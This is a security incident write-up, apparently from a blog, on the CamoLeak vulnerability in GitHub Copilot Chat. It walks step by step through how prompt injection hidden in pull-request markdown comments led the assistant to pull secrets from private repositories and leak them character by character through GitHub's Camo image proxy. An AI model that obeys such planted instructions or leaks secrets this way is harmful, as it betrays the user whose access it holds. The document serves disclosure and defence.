CamoLeak: A Copilot Chat Vulnerability That Exfiltrated Private Repo Secrets via GitHub's Own Image Proxy
In October 2025, researchers disclosed a critical vulnerability chain in GitHub Copilot Chat (CVSS 9.6, CVE-2025-59145) that enabled silent exfiltration of private repository data and secrets, including AWS keys, by combining remote prompt injection with a Content Security Policy (CSP) bypass using GitHub's own infrastructure.
The flaw was dubbed CamoLeak because the exploit relied on GitHub's Camo image proxy — normally used to safely serve remote images — as the final data exfiltration channel.
GitHub mitigated the issue by disabling image rendering in Copilot Chat on August 14, 2025, following responsible disclosure via HackerOne in June 2025.
What transpired
Copilot Chat derives much of its usefulness from context: pull request descriptions, issues, comments, and repository files can be pulled into the assistant's working set to generate better suggestions.
CamoLeak exploited that same mechanism.
Researcher Omer Mayraz of Legit Security discovered that an attacker could plant malicious instructions inside GitHub content that Copilot Chat ingests — specifically through hidden markdown comments in pull requests that are not visible in the standard web UI but exist in raw markdown that Copilot can still parse.
Once a victim user opened Copilot Chat in the affected context, the injected instructions could cause Copilot to:
- extract sensitive code or secrets from the private repository context,
- encode that data character-by-character using a pre-generated dictionary of Camo URLs,
- and silently exfiltrate it through image requests to an attacker-controlled server, without requiring direct code execution on the victim's machine.
The researcher demonstrated exfiltration of AWS keys, security tokens, and even the description of an undisclosed zero-day vulnerability stored inside a private issue on a private organization's repository.
How the failure happened
This incident was not a model jailbreak or a user mistake. It was an architectural vulnerability chain that emerged from three conditions:
1) Copilot Chat consumed untrusted collaboration text as agent instructions
GitHub repositories are full of untrusted text: issues, comments, PR descriptions, commit messages.
CamoLeak turned these into an instruction surface.
By inserting prompt injection payloads into pull request content — specifically using GitHub's "invisible" markdown comment syntax that doesn't render in HTML but is still parsed by Copilot — the attacker gained control over what Copilot treated as relevant instructions.
The key point: a user could review a pull request, see nothing suspicious in the rendered UI, and still expose Copilot to the attacker's instruction stream.
2) Copilot Chat inherited the victim's access to private repository context
Copilot Chat runs with the permissions of the logged-in user.
If a user has access to a private repository, Copilot does too — and therefore the attacker's injected instructions can cause Copilot to retrieve data from privileged context and treat it as content to be processed.
This is where "prompt injection" becomes materially worse than hallucination: it can be used as a retrieval control mechanism for privileged data.
3) The CSP bypass: data was exfiltrated through image rendering via GitHub Camo
Even if an attacker can convince Copilot to retrieve sensitive data, they still need an outbound channel.
CamoLeak's novelty was using GitHub's own image proxy (Camo) to create one.
The attack worked as follows:
- Any URL to an external image in GitHub content is passed through Camo and rewritten as
https://camo.githubusercontent.com/[unique signature hash]. - The researcher created a dictionary of all letters and symbols, pre-generated corresponding Camo URLs for each character, and embedded the dictionary into the injected prompt.
- A web server was configured to respond with a 1×1 transparent pixel to each request.
- The malicious prompt instructed Copilot to search for keywords like
AWS_KEY, extract the value, then load a 1×1 pixel image for each character using the Camo URLs as an alphabet. - By monitoring which image locations were requested by Camo, the attacker could reconstruct the stolen value character by character.
This combination — prompt injection → privileged retrieval → character-by-character Camo proxy exfiltration — enabled silent leakage of private source code and secrets without triggering security alerts.
GitHub's mitigation
GitHub responded quickly after responsible disclosure via HackerOne in June 2025.
The mitigation deployed on August 14, 2025 included:
- disabling image rendering in Copilot Chat entirely, shutting down the exfiltration channel, and
- blocking the specific use of Camo for chat-rendered content.
Public disclosure occurred on October 8, 2025, after the fix had been in place for nearly two months.
The fix was blunt — it removed a useful feature from Copilot Chat — but it addressed the key failure mode: image-based exfiltration that could be driven by untrusted prompt injection content.
Appendix: Sources
- Legit Security: CamoLeak: Critical GitHub Copilot Vulnerability Leaks Private Source Code
- SecurityWeek: GitHub Copilot Chat Flaw Leaked Data From Private Repositories
- The Register: GitHub patches Copilot Chat flaw that could leak secrets
- CSO Online: GitHub Copilot prompt injection flaw leaked sensitive data from private repos
- Dark Reading: GitHub Copilot 'CamoLeak' AI Attack Exfiltrates Data
